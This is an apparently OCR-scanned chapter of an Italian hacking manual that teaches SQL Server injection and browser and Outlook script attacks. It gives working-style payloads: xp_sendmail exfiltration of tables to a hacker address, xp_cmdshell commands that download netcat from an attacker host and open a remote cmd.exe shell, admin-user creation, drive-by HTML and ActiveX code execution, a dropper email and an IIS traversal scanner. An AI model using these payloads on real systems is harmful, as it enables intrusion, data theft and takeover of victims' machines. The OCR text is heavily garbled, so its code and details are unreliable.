Molte volte i progettisti delle interfacce WEB non curano in modo particolare il controllo dei 
valori inseriti all'interno dei campi dei vari guestbook o altri software che inserisco e poi 
leggono dati da un database. 

Un giorno l'amministratore di una società concorrente ad un'altra che eseguiva ricerche nel 
campo del genoma ricevette una email da parte di un hacker il quale affermava che era 
riuscito ad impossessarsi dei dati della società concorrente e che questi erano venduti ad una 
cifra cospicua. 

Il costo elevato era giustificato dal fatto che la società a cui erano stati carpiti i dati possedeva 
un firewall molto sicuro collegato al server, che forniva servizi di interrogazione sulla base dati 
ai clienti, il quale aveva praticamente tutte le porte filtrate o disattivate. 
In altre parole il server veniva filtrato in modo tale che solo le porte 25 e 443 passavano. 
Indipendentemente da tutto l'hacker era riuscito a sottrarre le informazioni da vendere. 
L'amministratore della società a cui era stata fatta l'offerta che capiva qualche cosa di sistemi 
informativi si impallo volendo capire in che modo l'hacker era riuscito ad accedere al sistema. 
Collegandosi sul sito della società del genoma si accorse che era attivo un servizio a 
pagamento indirizzato alla società che erano interessate ad eseguire delle ricerche su 
questo. 

Il login era gestito tramite un file .HTML dentro al quale ad un certo punto era presente il 
meccanismo che gestiva i login. 
Il codice di quel punto era : 

< forni name=" Logon" method=" post" 

action=" https : //www. genoma . com/scripts /Logon . asp> 

<p>User name: <input type=" text" name=" uname" maxlenght=" 25" > 



A questo punto l'amministratore provò a premere il pulsante di OK senza inserire nulla 
vedendosi stampare il seguente messaggio. 



Microsoft OLE DB Provider for SQL Server error ' 80040el4' 
Unclosed quotation mark before the character string w and 
Password=' ' . 

/scripts /Logon. asp, Line 20 



A questo punto provò ad inserire il nome IO come Login e un apicetto come password. 
La risposta fu : 



Microsoft OLE DB Provider for SQL Server error y 80040el4' 
Unclosed quotation mark before the character string w ' . 
/scripts /Logon. asp, Line 20 



Questo lo portò a capire che esisteva il campo Name e quello Password. 
Infatti inserendo sia un utente che una password la risposta fu : 

GENOMA Logon Failed 
Unknow user: IO 



Ma come aveva fatto l'hacker a conoscere il nome della tabella che veniva interrogata ? 
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Le varie prove avevano portato a supporre che il sistema interrogasse il database con una 
query del tipo : 

select * from nome_del_database where username= ' IO' and 
pa s s word= ' pa ss word' 

Se al posto della password l'amministratore avesse inserito la stringa : 
group by username - 
il sistema avrebbe risposto : 

Microsoft OLE DB Provider for ODBC Drivers error y 80040el4' 
Column ' Userlnfo . username' is invalid in the select list because it 
is not contained in either an aggregate function or the GROUP BY 
clause. 

/scripts/Logon.asp, Line 20 

A questo punto si sarebbe capito che il nome della tabella era Userlnfo 
Inoltre se il sistema SQL Server fosse stato settato insieme a Exchange ci sarebbe potuta 
essere una stored procedure chiamata xp_sendmail che permette di inviare delle email a 
qualsiasi destinazione. 

In aggiunta questa stored procedure ha la possibilità di eseguire una query per selezionare a 
chi inviare i dati. 

Le stored procedure sono procedure che vengono salvate all'interno del database stesso. 
Se volessimo inserire tutti gli statement SQL all'interno di un database invece di inserirli 
dentro al nostro programma, successivamente potremmo solo richiamarle ed eseguirle 
mediante statement speciali. 

Considerate il seguente comando da concatenare alla fine di un normalissimo statement 
SQL: 

Master. .xp_sendmail @recipients='hacker@hacker.org', @subject = 'Saluti!', @query='Select 
* from usernames order by ID', @attach:result=True 

Questa estrarrebbe I dati dall'archivio usernames e invierrebbe un email. 
Come avete visto xp_sendmail permette di specificare altre stored procedure 
Se desiderassimo avere la struttura del database dovremmo dare la query : 



Il fatto di poter specificare delle stored procedure ci permette di di eseguire una xp_sendmail 
con sp_help userinfo. 

Sp_help è una piccolissima stored procedure che permette di eseguire il dump della struttura 
del database, le relazioni e molte altre informazioni. 

Come sempre le maggiori pericolosità derivano dai system administrator che settano i sistemi 
come non dovrebbero essere settati. 

Se ad esempio SQL SERVER venisse lanciato come LocalSystem con privilegi di 
Administrator o addirittura come Domain Administrator allora sarebbe possibile usare un'altra 
stored procedure chiamata xp_cmdshell per eseguire dei comandi dentro ad una shell DOS. 
Per chi non lo sapesse quando un sistema è collegato ad un Dominio un sistema potrebbe 
fare il login come macchina locale o come login di dominio. 

Il fatto di inserire parti di statement SQL dentro ai valori letti dentro a campi WEB potrebbe 
essere ancora più pericoloso. 

Supponiamo di sapere che su di un sistema ci sia un utente numerato '00001' di cui non si 
conosce la password per accedere. 

Nella maschera WEB verranno chiesti il codice utente e la sua password dopo di che questi 
dati verrebbero inseriti dentro ad uno statement SQL del tipo : 
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SELECT * FROM Userlnfo Where (Utente=' 00001' AND Password=' valore 
password' ) 

Chiaramente il sistema, a meno che non siate fortunati a indovinare la password, vi 
risponderà dicendovi che la password è errata. 

Ma se a questo punto invece di mettere solo la password noi scrivessimo : 



password' +or+Utente%3d' 00001' 



cosa capiterebbe ? 

Il carattere + verrebbe traslato in uno spazio mentre quello %3d in un segno = per cui lo 
statement SQL diventerebbe: 



SELECT * FROM Userlnfo Where (Utente=' 00001' AND Password=' password' 
or mente*' 00001' ) 

Chiaramente I dati restituiti non li potremo manipolare ma dovremo accettare quelli che il 
WEB ci restituisce. 

La ricerca dei database SQL Server potrebbe avvenire mediante un semplice porta scanner 
ricercando porte del tipo di 1403, 4505 anche se di fatto l'amministratore potrebbe settarie 
differentemente. 

(Un utility fatta apposta è SQLPING la quale restituisce le seguenti informazioni : 



Nome del server SQL 

Nome istanza (quella di default è MSSQLserver) 
Stato cluster (se il server è parte di un sistema in cluster) 
Versione 



metodo di lavoro convenzionale è quello mediante il QUERY ANALYZER. 



Fib rfarffca Qjerf 5trLinmti FriEitra ? 





i- 



LÌ master 
(J model 
(j msdb 
IJ Hothwrd 
U F" ta 
Q SKbGéh 
tj lermcidb 
G Webatek 
□ Webstcrc 

Uggelb cnrnL*ii 

l" I Funzori ò carfguiaacfit 
I ~i Funaioli pei cifiofi 
I ~l Funeiori di dala e oia 
f ^1 Funeiori matematiche 
r I Funeiciii d aasjrsjaiione 

Funznri pei meledefc 
i" i c : : mi ■ ,l 

Ogcrlti [HI Modeli] 



rz 



Chiaramente la connessione ad un sistema SQLSERVER deve essere supportato 
dall'inserimento del login e della password corretta. 

A questo punto ci ritroviamo nuovamente nella necessità di trovare il metodo per individuare 
le password corrette. 
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Negli altri capitoli abbiamo visto utility particolari che permettevano di usare la forza bruta, il 
metodo combinatorio, per l'individuazione delle pasword. 

Generalmente i sistemi SQL server possiedono l'utente sa che sarebbe quello del system 
administrator. 

Moltissimi sistemisti non lo eliminano ma semplicemente cambiano la password. 

Esistono delle utilties specializzate per l'individuazione delle password legate all'utente SA e 

precisamente SQLDICT e SQLBF. 

Come tutte le utilties basate su dizionari anche queste potrebbero richiedere moltissimi tentivi 
i quali verrebbero sempre logati. 

SQL berver conrigured ror Chread mode 
Using dynamic lock allocation, [2500] Lo 
Attermpting to initialize Distributed Trans 
Failed to obtain TransactionDispenserln 
Starting up database 'master', 
Using '55NETLIEi.DLL' version '8.0.194', 
Starting up database 'model' . 
Starting up database 'msdb'. 
Server narne is 'DEVELOPMENT 1 . 
Starting up database 'pubs'. 
Starting up database 'Northwind'. 
Starting up database 'Webstore', 



H"tÉ] Attività corrente - 2C 
Piani di rnanutenzionfi 
Log di SQL Server 



Corrente - 04/2i 



0 Archivio #1 - 04/ 
0 Archivio #2 - 03/ 
0 Archivio #3 - 03/ 
0 Archivio #4 - 02/ 
0 Archivio #5 - 02/ 
0 Archivio #6 - 02/ 
\h~Cj Replica 
\t\~C~\ Protezione 
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L'utility SQLPOKE invece di eseguire delle prove come i programmi di prima tenta di trovare 
gli accessi di dove esistono pasword blank. 

Quando riesce a trovare un accesso sa con password blank può eseguire fino a 32 comandi 
specificati. 

Precedentemente abbiamo parlato di stored procedure e del metodo per eseguirle. 
Queste che seguono sono altre che possono essere usate su SQL SERVER 2000. 

Xp_peekqueue 
Xp_printstatements 
Xpproxiedmetadata 
Xp_setsqlsecurity 
Xp_sqlagentmnitor 
Xp_enumresultset 
Xp_showcolv 
Xp_displayparamstmt 
Xp_updatecolvbm 
Sp_oacreate 
Sp_oamethod 
Sp_oagetproperty 
Sp_oasetproperty 



Quante volte nel libro ci siamo trovati davanti alla fatidica tftp per trasferire codice pericoloso 
sui servers ? 

Lo abbiamo visto con le email, con i vari unicode bug, quello msadc e quindi non poteva 
mancare un metodo di usarlo con SQL SERVER. 

Supponiamo di avere sempre su di un WEB il campo dove quello che scriviamo dentro viene 

usato per settare lo statement SQL. 

Invece di scrivere solo il valore di ricerca inseriamo : 



zz' UNION SELECT 1 , (SELECT qqversion), SUSER_SNAME(), 1 - 

In pratica cerca due z eseguendo un UNION di un risultato vuoto con i dati che l'hacker vuole 
ottenere. 

La parte più interessante di questa iniezione di codice sono i due trattini alla fine. 

Questo è necessario per commentare l'ultime virgolette al fine di circondare l'input 

specificato dall'hacker. 
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Se il tutto funziona l'hacker riceverà come output la versione di SQL e lo stato del service 
pack, la versione dell' OS e anche il login usato per dare il comando. 

Chiaramente se il tutto fosse eseguito come administrator allora sarebbe possibile dare 
qualsiasi comando. 

Un'altra stringa da iniettare potrebbe essere la seguente : 

zz' exec master.. xp_cmdshell 'tftp-i nostrohost.com GET netcat.exe' — 



e quindi questa : 

zz' exec master.. xp cmdshell 'netcat -L -d -e cmd.exe -p 53' — 



Ed ecco come abbiamo nuovamente ativato tftp per trasferire ed eseguire il solito netcat. 
I comandi xp usano librerie esterne per la loro esecuzione e come tutte le cose che hanno 
come scopo quello di estendere le possibilità dell'amministratore esistono dei lati oscuri nel 
loro uso. 

Come abbiamo detto prima i problemi vengono fuori quando SQL server viene eseguito come 
LocalSystem. 

Infatti grazie a questi comandi XP uniti a certe possibilità dei comandi net è possibile, ad 
esempio, aggiungere utenti al sistema. 

Xp_cmdshell 'net user found stone /ADD' 
Xp_cmdshell 'net localgroup /ADD Administrators found' 

Le due righe di prima aggiungono un utente found con password stone. 

Uno script che potrebbe essere inviato alla vittima tramite il Query analyzer è quella che 

segue : 



EXEC xp_cmdshell 'echo open 192.168.234.39 > ftptem' 

EXEC xp_cmdshell 'echo user anonymous ladee@da.com »ftptemp' 

EXEC xp_cmdshell 'echo bin »ftptemp' 

EXEC xp_cmdshell 'echo get nc.exe »ftptemp' 

EXEC xp_cmdshell 'echo get kill.exe' 

EXEC xp_cmdshell 'echo get samdump.dll »ftptemp' 

EXEC xp_cmdshell 'echo get pwdump2 »ftptemp' 

EXEC xp_cmdshell 'echo get pulist.exe »ftptemp' 

EXEC xp_cmdshell 'echo bye »ftptemp' 

EXEC xp_cmdshell 'ftp -n -s:ftptemp' 

EXEC xp cmdshell 'erase ftptemp' 

EXEC xp cmdshell 'start ne -L -d -p 2002 -e cmd.exe' 



Ora sarà sufficiente lanciare sulla nostra macchina : 



C:\>nc-vv 10.0.0.1 2301 
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Quando HTML diventa pericoloso 

Nei vari capitoli del volume abbiamo visto come di fatto molti comandi che possono essere 
inseriti all'interno di pagine HTML possono diventare pericolose. 

Con il passare del tempo in genere si pensa che certi problemi possano essere superati ma 
alla fine invece poi rischiamo di rimanere a bocca aperta vedendo che su versioni di sistemi 
operativi avanzati quelle tecniche funzionano ancora. 

Tutto il volume è stato scritto sotto sistema operativo WHISTLER ovvero Windows XP Server 
come viene mostrato nella seguente immagine. 



System Ptoperties 



Advanced 
General 



AulomaliD Update 
Computer Narne 



Ramona 
H ardi/Dare 




Sfatami 

kleiosaft Windows XP 
Server 

Version 3002 

Aerjshered Ira 

RawoEÌBnar dòtti 
CansiJente h Inlormatica 
gzC3B-3Ea^a6E56ÉrU[r155 

Compulsi: 

Intel Pentium II processor 

343 MHz 

288 NG af FWM 



A questo punto quale occasione diventa migliore per vedere quali script funzionano su questo 
sistema operativo ? 

Partiamo da un semplicissimo test atto a vedere se è possibile attivare un eseguibile senza 
far vedere nulla se non il programma attivato. 
Prendiamo il codice che segue : 

<span id="oSpan"x/span> 
<script language="jscript" defer> 

oSpan.innerHTML='<object classid="clsid:1 1111111-1111-1111-1111-111111111111" 
codebase="c:/winnt/system32/calc.exe"x/object>'; 



e inseriamolo all'interno di un file HTML che inseriremo sul server MS. 

<html> 
<head> 

<title>Untitled Document</title> 

<meta http-squiv="Content-Type" content="text/html ; charset=iso-8859- 

2"> 

</head> 



<body bgcolor="#FFFFFF" text="#000000"> 
i="oSpan"x/span> 
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oSpan . innerHTML= ' <object classid="clsid: 11111111 -1111-1111-1111- 
111111111111 " codebase="e: /w±nnt/system32/calc.exe"x/object> ' ; 
</script> 
</body> 
</html> 

Considerate che io ho Windows sul disco E: per cui il percorso a cui mi riferisco per attivare il 
calcolatore è appunto : 

C:\>\winnt\system32\calc.exe 

Mi collego a http://localhost e .... Sorpresa ! 
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Questo significa che se il codice fosse dentro ad una pagina HTML piazzato su un sisto WEB 
potremo attivare qualsiasi programma sul sistema dell'ignaro navigatore. 
La stessa metodologia potrebbe essere codificata in XML in modo tale da porteria inserire 
all'interno di un qualsiasi documento senza che l'host la possa stoppare. 



<span datasrc="#oExec" datafld="exploit" 


dataformatas="html"x/span> 


<xml 


id="oExec"> 


<security> 




<exploit> 




<![CDATA[ 




<object id="oFile" classid="clsid:1 1111111 


-1111-1111-1111-111111111111" 


codebase="c:/winnt/system32/calc.exe"x/object> 




]]> 




</exploit> 




</security> 




</xml> 





Sempre legato all'esecuzione di codice su di un sistema remoto possiamo usare il seguente 
codice che nel'esempio legge un file di testo che chiaramente deve esistere. 



webctrll . html 

<object id=web2 

classid="clsid: 8856F961-340A-11D0-A96B-00C04FD705A2" 

> 

</object> 
<SCRIPT> 

alert ("Thls script reads C: \\TEST . TXT\nYou may need to create it") ; 
a=window. open ( "file : //c : /test . txt ", "A ") ; 

setTimeout ( ' web 2 . Navigate ("Javascript :alert (document .body. innerText) " 

, "", "A") ; ' ,2000) ; 

</SCRIPT> 
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Nel caso precedente l'attivazione di un programma avveniva da server a client o al limite in 
tutte quelle procedure dove è possibile sfruttare un file XML. 

Sempre nei capitoli legati ai WEB abbiamo visto diversi BUGS che permettevano di interagire 
con comandi sui WEB Server. 

Un altro di questi bugs è quello definito con il termine di Escaped Characters Decoding Bug. 
Il seguente programma in pari testa un WEB a questo bug. 

# .' / usr/bln/perl 
# 

# iis_promisc v2 . 0 
# 

# This is a peri script to test the Infamous 

# Microsoft US holes: 
# 

# -*- Escaped Characters Decoding Bug 

# -*- Unicode Directory Transversai Bug 
# 

# * Support Proxy Server 

# * Over 20 tests will be made ( if found display the patch URL too 
:) 

# 

# Added to v2: 
# 

# -*- Executable File Parsing Bug check 

# -*- Over 40 bugs tested! 
# 

# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ 

# The package libwww is found in many linux distributions 
# 

# by inode@unsekure.com.br 

# greetz to iunsekure @ irc.brasnet.org 

# http : //unsekure . com . br 
# 

# 05/2001 

if ($#ARGV<0) {die "\n-*- iis _promisc -*-\nUse: $0 
www. target . com \n \n "; } 

use LWP; 

$ua = new LWP : : UserAgent ; 

## Uncomment the line below to use a proxy server 
#$ua->proxy ( [ 'http ' ] , ' http : //proxy . server . com:PORT/ ' ) ; 

$ua->timeout (60) ; 

$ua->agent ( "Mozilla/5 . 0 (Win95) ") ; 

($target = @ARGV[0]); 
$vuln_flag = 0; 
$port = 80; 
$test_command = 

"winnt/system32/cmd . exe ? /c+echo+MinhaNossaSenhoraDoPerpetuoSocorro "; 
$dir_command = "winnt/system32/cmd.exe?/c+dir"; 
$iis = "1"; 

my @dir= ( 

# You can add more exec dirs here 
#"/somedir/" , 
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"/", ## wwwroot 
"/scripts/" , 
"/msadc/", 
"/cgi-bin/", 
"/bin/", 
"/samples/", 
"/_vti_cnf/", 
"/ '_vti_bln/ '" , 
" '/ads ampie s/ ", 
"/iisadmpwd/", 
"/Rpc/", 
"/PBServer/") ; 

my @string=( 

". . %255c. . %255c. . %255c. . %255c. . %255c. . %255c", 

". . %cO%af. ./. ■ %cO%af. ./. . %cO%af. ./", 

" . . %e0%80%af. . /. . %e0%80%af. ./. . %e0%80%af. ./", 

"boo.bat/. . %C1%9C. . %C1%9C. . %C1%9C. . %C1%9C. . %C1%9C. . %C1%9C. . %C1%9C") ; 

if ( ($ENV{ 'OSTYPE' } Il $ENV{ ' TERM ' } ) =~ /linux/ ) { 
$found = "lynx -dump"; 
} else { $found = "-*- VULN -*-"; ; 



foreach $vul_dir (@dir) { 
foreach $vul_string (Qstring) { 
if ($iis) { 

Qoutput = conn ($vul_dir . $vul_string) ; 
foreach $output_line (Qoutput) { 

if ($output_line =~ /MinhaNossaSenhoraDoPerpetuoSocorro/) { 
$vuln_flag = $vuln_flag + 1; 
print " \n$found 
http: //" . $target . $vul_dir . $vul_string. $dir_command . " \n"; 
} 

} 

} else { print $output_line . " \n" ; exit; } 

ì 
ì 

if ($vuln_flag 1=0 ) { 
print qq~ 

— * — * — * — * — * — * — * — * — * — * — * — * — *— 
-*- Escaped Characters Decoding Bug —*— 
-*- Microsoft US 5.0 PATCH: 
_*_ 

http: //download, microsoft . com/download/win2000platform/Patch/q293826/ 
NT5/EN-US/Q293826_W2K_SP3_x86_en . EXE 
-*- Microsoft US 4.0 PATCH: 

http : //download. microsoft . com/download/winntsp/Patch/q293826/NT4/EN- 
US/Q295534Ì . exe 

—* * * * * * * * * * * * *_*_ 

-*- Unicode Directory Transversai Bug —*— 

-*- Microsoft US 5.0 PATCH: 

_*_ 

http : //www .microsoft . com/windows2000 / 'downloads / 'criticai/ 'q2 69862 / 'de fau 
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_*_ 

http: //www. microsoft . com/ntsBrver/nts/downloads/criti cal/q269862/defa 
ult . asp 

—* * — * — * — * — * — * — * * * *_*_ 

-*- Executable File Parsing Bug —*— 

-*- Microsoft US 5.0 PATCH: 

_*_ 

http : //download. microsoft . com/download/win2000platform/Patch/Q277873/ 
NT5/EN-US/Q2778 73_W2K_SP2_x86_en . EXE 

-*- Microsoft US 4.0 PATCH: 
_*_ 

http : //www .microsoft . com/ntserver/nts/downloads/critical/q277873 
-*- $vuln_flag hole(s) found at $target! —*— 



} else { 

print "\n-*- $target : Not vulnerable -*-\n\n" ; 
exit; 

ì 



sub conn { 

my ($GET_STR) = @_; 
my $req = new 

HTTP: -.Request ( ' GET ' , 'http:// ' . $target . $GET_STR . $test_command) ; 
my $res= $ua->request ($req) ; 

if ( $res->server =~/IIS/ ) { 
$iis = 1; 

return $res->content; 
} else { 
$iis = 0; 

$err = $res->code; 
if ( $err == 404 ) { 

return print "\n-*- Not running MS-IIS -*-\n"; 
} else { return print " \n—*— HTTP error code $err Connection 
probi ems —*—\n"; } 




Un altro sistema di attacco legato a HTML è quello definito con il termine di HTML.Dropper il 
quale permette di creare un email con degli attachment nascosti. 
Create un file con esetensione .eml con il seguente contenuto : 

MIME-Version : 1.0 

To : http-equiv@excite . com 

Subject : 



.hta 



Content-Type : image/gif; charset=us-ascii 
Content-Transfer-Encoding: 7bit 

<! — 17.01.2001 http://www.malware.com — > 

<script>var wsh=new ActiveXObject (' WScript . Shell ') , 
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Quando questo viene eseguito un file .hta viene creato con il contenuto che desideriamo 
eseguire. 

Successivamente possiamo inserire il resto del nostro messaggio in modo da unire questo ad 
uno di quelli che spediremo. 

Nel capitolo precedente abbiamo visto come mediante quello che abbiamo definito con il 
termine del problem del 'SAFE FOR SCRIPTING' potevamo inviare delle email con contenuti 
che venivano attivati sul sistema ricevente soltanto mediante la lettura delle email. 
Qui usiamo lo tesso metodo ma mediante l'inclusione di un script il quale potrà esere 
utilizzato come test. 

Il messaggio creerà un directory che vi avvertirà che siete stati hackerati. 

From : "xxxxx " 
Subject : mail 

Date: Thu, 2 Nov 2000 13:27:33 +0100 

MIME-Verslon : 1.0 

Content-Type : multlpart /related; 

type= "multlpart /alternative " ; 

boundary= "1 " 
X-Prlority: 3 
X-MSMall-Priorlty : Norma 1 

— 1 

Content-Type : multlpart /alternative; 
boundary="2 " 

— 2 

Con tent- Type : text/html; 

charset="lso-8859-l " 
Con tent- Tran sfer-En codlng: quot ed-prl n t abl e 

<HTML> 
<HERD> 
</HEAD> 

<BODY bgColor=3D#ffffff> 

<iframe src=3Dcid: hello .wav helght=3D0 width=3D0></iframe> 

You Have Been Hacked! <BR> 

</BODY> 

</HTML> 

— 2 — 

— 1 

Content-Type: video/x-ms-asf ; 

name= "Flnjan_VBS_Demo . vbs " 
Con tent- Tran sfer-En codlng: quot ed-pri ntable 
Content-ID: <hello.wav> 

' Copyright (c) Flnjan Software=20 

******************************************* 

********************************************* 

*************************************************************************= 
************************** 

'This demonstration shows you the danger of running script files on your = 
PC. 

'A new folder will be created on your Windows Desktop directory named = 
'You Have Been Hacked! ' and several of your files will copied to this = 

folder. You may delete this folder (the files are copies only and the = 

originals have not been moved) . 

'This demo was created by Finjan Software, the leader in First-Strike = 
Security. Finjan delivers proactive security solutions that protect = 
companies and computer users from first-strike malicious code attacks = 
without relying on database updates. 

i ************************************************************************= 
*************************************************************************= 
*************************************************************************= 



************************** 
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On Error Resumé Next 

Dita fso, fldr, fi, F, shell, DeskPath, MyDocPath, = 

RecentPath,Favor±tePath, textl, text2, text3, text4, text5, text6, = 
CurrentFolder , objNet=20 

Set fso =3DCreateObject ("Scripting. FlleSystemObject") 

set shell =3DCreateObject ( "WScript . Shell ") 

Set objNet =3DWScript .CreateObject ( "WScript .Network" ) 

DeskPath =3Dshell . SpecialFolders ( "Desktop ") 
MyDocPath =3Dshell . SpecialFolders ( "MyDocuments ") 
RecentPath =3Dshell . SpecialFolders ( "Recent ") 
FavoritePath =3Dshell . SpecialFolders ( "Favorites ") 

fldr =3D fso . CreateFolder (DeskPath & "\You Have Been Hacked!") 

' copying the files 



Set CurrentFolder =3D fso.GetFolder(fldr) 
count =3D 0 

If (MyDocPath) Then 

fso.CopyFile MyDocPath & "\*.doc", DeskPath & "\You Have Been Hacked!" 

=09 

count=3DNumFiles (CurrentFolder) 
If (count < 5) Then 

fso.CopyFile MyDocPath & "\*.xls", DeskPath & "\You Have Been 

Hacked!" 
=09 

count=3DNumFiles (CurrentFolder) 
If (count < 5) Then 

fso.CopyFile MyDocPath & "\*.ppt", DeskPath & "\You Have 

Been = 
Hacked!" 

count=3DNumFiles (CurrentFolder) 
If (count < 5) Then 

fso.CopyFile MyDocPath & "\*.rtf", DeskPath & "\You Have 

Been = 
Hacked! " 

If (count < 5) Then 

fso.CopyFile MyDocPath & "\*.html", DeskPath & "\You Have 

Been = 
Hacked!" 

End If 
End If 
End If 

End If 

End If 



count=3DNumFiles (CurrentFolder) 
If (counter < 5) Then 

If (FavoritePath) Then 

fso.CopyFile FavoritePath & "\*.com*", DeskPath S "\You Have 

Been = 
Hacked! " 

count=3DNumFiles (CurrentFolder) 
If (FavoritePath) Then 

fso.CopyFile FavoritePath & "\*.url*", DeskPath & "\You 

Have Been = 
Hacked!" 

End If 
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End If 

' Creatlng and writing the text file 



Set fi =3D fso . CreateTextFlle ( DeskPath & "\You Have Been = 
Hacked! \\Flnjan Software Demo .txt" , True) 

fi .WriteLine ("Here Is some sensitive Information about your PC:") 
fi . WriteLine ( "Username : " & objNet . UserName) 
fi .WriteLine ( "Domain : " & objNet . UserDomain) 
fi . WriteBlankLines (2) 

fi .WriteLine ("This has been a demonstration to show you the danger of = 
running script files on your PC. ")=20 
fi . WriteBlankLines (2) 

fi .WriteLine ("A new folder has been created on your Windows Desktop = 
directory named 'You Have Been Hacked! ' and several of your files were = 
copied to this folder. You may delete this folder (the files are copies = 
only and the originals have not been moved) . ") 
fi . WriteBlankLines (2) 

fi .WriteLine ("This demo was created by Finjan Software, the leader in = 
First-Strike Security. Finjan delivers proactive security solutions = 
that protect companies and computer users from first-strike malicious = 
code attacks without relying on database updates.") 
fi . WriteBlankLines (1 ) 

fi .WriteLine (" www.finjan.com") 
fi . dose () =20 



shell. Run "explorer.exe " SDeskPath &"\You Have Been Hacked!" 
shell. Run "notepad.exe " SDeskPath &"\You Have Been Hacked! \F in jan = 
Software Demo .txt "=20 

' functions 



Function NumFiles (CurrentFolder) 
counter =3D 0 

Set i =3D CurrentFolder .Files 
For Each f2 in i 

If ( (fso.GetExtensionName (f2) =3D "doc") or 
(fso.GetExtensionName(f2) = 

=3D "ppt") or (fso.GetExtensionName (f 2) =3D "xls") or = 

( fso.GetExtensionName (f 2) =3D "mdb") or (fso.GetExtensionName(f2) =3D = 
"rtf") or (fso.GetExtensionName(f2) =3D "html") ) Then 
counter =3D counter + 1 

End if 

Next 

NumFiles =3D counter 
End Function 



Fate attenzione che potreste doverlo adattare al formato che abbiamo appunto visto nel 
capitolo precedente. 

Anche Java possiede alcuni problemi come ad esempio quello legato 
acom.ms.activeX.ActiveXComponent il quale permette l'esecuzione di codice arbitrario. 
Date un occhiata a questo codice per capire la logica. 

javaea . html 

<APPLET code="com.ms.activeX.ActiveXComponent" > 
</APPLET> 
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is instantiated — > 



<SCRIPT LANGUAGE= "JAVASCRIPT "> 
al=document . applets [0 ] ; 

fn=". . \ \ \ \Start M&nu\\ \ \Programs\\ \ \Startup\\ \ \EA.HTA"; 
/ / fn= "EA . HTA "; 

doc="<SCRIPT>sl=\ 'Hello world\\nTo get rld of this, delete the file 
EA.HTA in Startup 

folder\ ' ; alert (si ) ; document . body. innerHTML=sl </ "+ "SCRIPT> "; 

function fi () 

{ 

al . setProperty ( 'DOC ' , doc) ; 
ì 

function f () 
{ 

// The ActiveX classid 

cl=" {06290BD5-48AA-11D2-8432-006008C3FBFC} "; 

al . setCLSID (ci) ; 

al . createlnstance () ; 

setTimeout ("al . setProperty (' Path ' , ' "+fn+" ') " ,1000) ; 
setTimeout ("fi () ", 1500) ; 

setTimeout ( "al . invoke ( 'write ' , VA) ; alert ( ' "+fn+" created') ; " , 2000) ; 
} 

setTimeout ("f() ", 1000) 
</SCRIPT> 

<SCRIPT LANGUAGE="VBSCRIPT"> 
VA = ARRAY () 

' Just to get something like com . ms . com . Variant [ ] 
</SCRIPT> 



Piazzate sull vostro sito WEB (chiaramente un creato appositamente su qualche sito con 
spazio gratis) il codice html che segue inviate una email che usi il metodo di : 

<IFRAMESRC="http://somehost/javascript.html"x/IFRAME> 

Questo metodo è quello che abbiamo visto nei capitoli di prima che permetteva di fare 
eseguire del codice sul sistema del ricevente della email. 

Javascript . html 

<APPLET CODE=" outlook js . class" MAYSCRIPT> 

<PARAM NAME= "command " VALUE= "window. open ('http : //www. guninski . com ' 



outlook js . java 

import java.applet.Applet; 
import netscape . javascript . *; 
class outlookjs extends Applet { 



pub. 
{ 

try { 

j= (JSObject) JSObject . getWindow (thi 
j . eval (getParameter ( "command") ) ; 

m 

catch (Exception e) {System. out .println (e) ; } , 
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Ricordatevi che anche il codice che è indicato a colpire dal WEB al client può di fatto essere 

usato grazie alla email attivatici mediante le quali potete fare in modo che degli utenti remoti 

vadano senza saperlo a leggere le pagine WEB su un sito fantasma. 

Un altro BUG di OUTOLOOK potrebbe permettere di prendere il possesso di un sistema 

remoto. 

In pratica dei programmi a caso potrebbero usare i file .ehm per individuare la directory 

temporanea di internet. 

Considerate il seguente codice HTML : 

<OBJECT DATA="http://SOMEHOST.COM/chmtemp.html" TYPE="text/html" WIDTH=200 



SOMEHOST è un altro web rispetto a quello da cui il codice html è stato leto. 

Una volta che viene identificata una directory temporanea è possibile usarla per inserirgli un 

file .CHM e successivamente eseguirlo mediante window.showHelp(). 

Il codice che segue è una versione sofisticata : 



chmtempmain.html 

<IMG SRC="chm1 .ehm" WIDTH=1 HEIGHT=1 > 
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1> 
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1> 
<BR> 

The object below must be loaded from a server with name different from the parent document 



it may be the same server but use the IP address or another alias. 
<BR> 

If this does not work try increasing the number of "ehm*. ehm" in IMG and showHelp. 
<BR> 

<OBJECT DATA="http://guninski.com/chmtemp.html" TYPE="text/html" WIDTH=200 
HEIGHT=200> 



chtmtemp.html 

<SCRIPT> 
function g() 
{ 

s=document.URL; 

path=s.substr(0,s.lastlndexOf("\\")); 

path=unescape(path); 

alert("One of your temp files directory is: "+path); 

window.showHelp(path+"\\chm1 [1 ].chm"); 

window.showHelp(path+"\\chm2[1].chm"); 

window.showHelp(path+"\\chm3[1].chm"); 

window.showHelp(path+"\\chm4[1].chm"); 

window.showHelp(path+"\\chm5[1].chm"); 

window.showHelp(path+"\\chm6[1].chm"); 

window.showHelp(path+"\\chm7[1].chm"); 

window.showHelp(path+"\\chm8[1].chm"); 

window.showHelp(path+"\\chm9[1].chm"); 

window.showHelp(path+"\\chm10[1].chm"); 
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} 

setTimeout("g()",5000); // if you are on a slow internet connection you must increase the delay 
</SCRIPT> 



Un altro BUGS legato ad OUTLOOK. 

Se un utente legge il seguente codice dentro ad un pagina HTML ed esegue il preview di un 
messaggio, alora diventa possibile prendere possesso del suo computer. 
Il codice è : 

<br> 

<object ld="ol" 

classid="clsid:0006F063-0000-0000-C000-000000000046" 

> 

<param name="folder" value="Inbox"> 
</object> 

<script> 
function f () 
{ 

//alert (o2 . object) ; 

sel=ol . object . selection; 

wl=sel . Item (1 ) ; 

alert ("Subject="+wl . Subject) ; 

alert ( "Body= "+wl . Body+ " [ "+wl . HTMLBody+ "] ") ; 

alert ("May be deleted") ; 

//wl. Delete () ; 

w2=wl . Session. Application . CreateObject ( "WScript . Shell ") ; 
alert ("Much more fun is possible") ; 



